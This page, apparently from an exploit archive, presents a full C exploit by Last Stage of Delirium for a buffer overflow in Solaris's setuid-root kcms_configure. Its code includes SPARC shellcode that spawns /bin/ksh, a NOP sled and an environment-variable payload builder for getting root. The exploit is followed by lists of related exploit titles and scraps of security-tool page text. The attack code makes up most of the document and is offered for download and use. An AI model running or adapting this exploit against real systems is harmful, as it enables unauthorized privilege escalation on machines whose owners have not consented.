Menu

Search for hundreds of thousands of exploits

"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (1)"

Author

Exploit author

"Last Stage of Delirium"

Platform

Exploit platform

solaris

Release date

Exploit published date

1999-12-01

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
/*
source: https://www.securityfocus.com/bid/2605/info

The Kodak Color Management System configuration tool 'kcms_configure' is vulnerable to a buffer overflow that could yield root privileges to an attacker.

The bug exists in the KCMS_PROFILES environment variable parser in a shared library 'kcsSUNWIOsolf.so' used by kcms_configure. If an overly long KCMS_PROFILES variable is set and kcms_configure is subsequently run, kcms_configure will overflow. Because the kcms_configure binary is setuid root, the overflow allows an attacker to execute arbitrary code as root.

Exploits are available against Solaris x86 and Solaris Sparc.
*/

/*## copyright LAST STAGE OF DELIRIUM dec 1999 poland        *://lsd-pl.net/ #*/
/*## kcsSUNWIOsolf.so                                                        #*/

#define NOPNUM 940
#define ADRNUM 32
#define PCHNUM 204

char setuidcode[]=
    "\x90\x08\x3f\xff"     /* and     %g0,-1,%o0           */
    "\x82\x10\x20\x17"     /* mov     0x17,%g1             */
    "\x91\xd0\x20\x08"     /* ta      8                    */
;

char shellcode[]=
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>        */
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode>          */
    "\x7f\xff\xff\xff"     /* call    <shellcode+4>        */
    "\x90\x03\xe0\x20"     /* add     %o7,32,%o0           */
    "\x92\x02\x20\x10"     /* add     %o0,16,%o1           */
    "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]          */
    "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]         */
    "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]         */
    "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
    "\x91\xd0\x20\x08"     /* ta      8                    */
    "/bin/ksh"
;

char jump[]=
    "\x81\xc3\xe0\x08"     /* jmp     %o7+8                */
    "\x90\x10\x00\x0e"     /* mov     %sp,%o0              */
;

static char nop[]="\x80\x1c\x40\x11";

main(int argc,char **argv){
    char buffer[4096],adr[4],*b,pch[4],*envp[4],display[128];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland  //lsd-pl.net/\n");
    printf("kcsSUNWIOsolf.so solaris 2.6 2.7 2.8 sparc\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()-256-112;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()-512-112;

    sprintf(display,"DISPLAY=%s",argv[1]);
    envp[0]=buffer;
    envp[1]=display;
    envp[2]=0;

    b=buffer;
    sprintf(b,"KCMS_PROFILES=");
    b+=14;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    execle("/usr/openwin/bin/kcms_configure","lsd","-o","lsd",0,envp);
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-04-21 "Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation" local solaris "Marco Ivaldi"
2019-10-21 "Solaris 11.4 - xscreensaver Privilege Escalation" local solaris "Marco Ivaldi"
2019-10-16 "Solaris xscreensaver 11.4 - Privilege Escalation" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)" local solaris "Marco Ivaldi"
2019-01-14 "xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)" local solaris "Marco Ivaldi"
2018-10-16 "Solaris - RSH Stack Clash Privilege Escalation (Metasploit)" local solaris Metasploit
2018-09-25 "Solaris - 'EXTREMEPARR' dtappgather Privilege Escalation (Metasploit)" local solaris Metasploit
2018-09-18 "Solaris - libnspr NSPR_LOG_FILE Privilege Escalation (Metasploit)" local solaris Metasploit
Release Date Title Type Platform Author
2003-10-22 "Sun Java Virtual Machine 1.x - Slash Path Security Model Circumvention" dos multiple "Last Stage of Delirium"
2003-03-02 "Sendmail 8.12.x - Header Processing Buffer Overflow (1)" remote unix "Last Stage of Delirium"
2003-02-12 "HP-UX 10.x - rs.F3000 Unauthorized Access" local hp-ux "Last Stage of Delirium"
2003-02-12 "HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)" local hp-ux "Last Stage of Delirium"
2002-11-21 "Sun/Netscape Java Virtual Machine1.x - Bytecode Verifier" remote multiple "Last Stage of Delirium"
2002-11-21 "Symantec Java! JustInTime Compiler 210.65 - Command Execution" remote windows "Last Stage of Delirium"
2002-11-21 "Microsoft Java Virtual Machine 3802 Series - Bytecode Verifier" remote windows "Last Stage of Delirium"
2002-06-20 "SGI IRIX 6.x - 'rpc.xfsmd' Remote Command Execution" remote irix "Last Stage of Delirium"
2002-01-01 "Solaris 2/7/8/9 cachefsd - Remote Heap Overflow" remote solaris "Last Stage of Delirium"
2001-04-11 "SGI IRIX 6.5 / Solaris 7.0/8 CDE - '/usr/dt/bin/dtsession' Local Buffer Overflow" local unix "Last Stage of Delirium"
2001-03-15 "Solaris 2.6/7.0/8 - snmpXdmid Buffer Overflow" remote solaris "Last Stage of Delirium"
2000-12-01 "IBM AIX 4.3 - '/usr/lib/lpd/digest' Local Buffer Overflow" local aix "Last Stage of Delirium"
2000-12-01 "IBM AIX 4.3.x - '/usr/lib/lpd/piobe' Local Buffer Overflow" local aix "Last Stage of Delirium"
2000-12-01 "IBM AIX 4.x - '/usr/bin/setsenv' Local Buffer Overflow" local aix "Last Stage of Delirium"
2000-09-01 "AIX 4.2/4.3 - '/usr/lib/lpd/pio/etc/piomkapqd' Local Buffer Overflow" local aix "Last Stage of Delirium"
2000-08-02 "IRIX 6.5.x - '/usr/sbin/dmplay' Local Buffer Overflow" local irix "Last Stage of Delirium"
2000-07-01 "IRIX 5.2/5.3/6.x - TelnetD Environment Variable Format String" remote irix "Last Stage of Delirium"
2000-03-29 "SGI IRIX 5.x/6.x - Objectserver" remote irix "Last Stage of Delirium"
2000-01-01 "IRIX 6.5.x - '/usr/lib/InPerson/inpview' Race Condition" local irix "Last Stage of Delirium"
1999-12-20 "SCO Open Server 5.0.5 / IRIX 6.2 ibX11/X11 Toolkit/Athena Widget Library - Local Buffer Overflow" local multiple "Last Stage of Delirium"
1999-12-01 "Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (2)" local solaris "Last Stage of Delirium"
1999-12-01 "Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (1)" local solaris "Last Stage of Delirium"
1999-08-17 "AIX 4.1/4.2 - 'pdnsd' Remote Buffer Overflow" remote aix "Last Stage of Delirium"
1999-07-19 "SGI Advanced Linux Environment 3.0 / SGI IRIX 6.5.4 / SGI UNICOS 10.0 6 - arrayd.auth Default Configuration" remote multiple "Last Stage of Delirium"
1999-07-13 "Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)" remote multiple "Last Stage of Delirium"
1998-11-01 "IRIX 6.2/6.3 - '/bin/lpstat' Local Buffer Overflow" local irix "Last Stage of Delirium"
1998-04-01 "Solaris x86 2.4/2.5 - nlps_server Buffer Overflow" remote solaris "Last Stage of Delirium"
1997-09-01 "IRIX 5.3/6.x - '/usr/bin/mail' Local Buffer Overflow" local irix "Last Stage of Delirium"
1997-09-01 "SGI IRIX 6.2 - 'libgl.so' Local Buffer Overflow" local irix "Last Stage of Delirium"
1997-07-17 "SGI IRIX 6.3 - 'pset' Local Privilege Escalation" local irix "Last Stage of Delirium" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected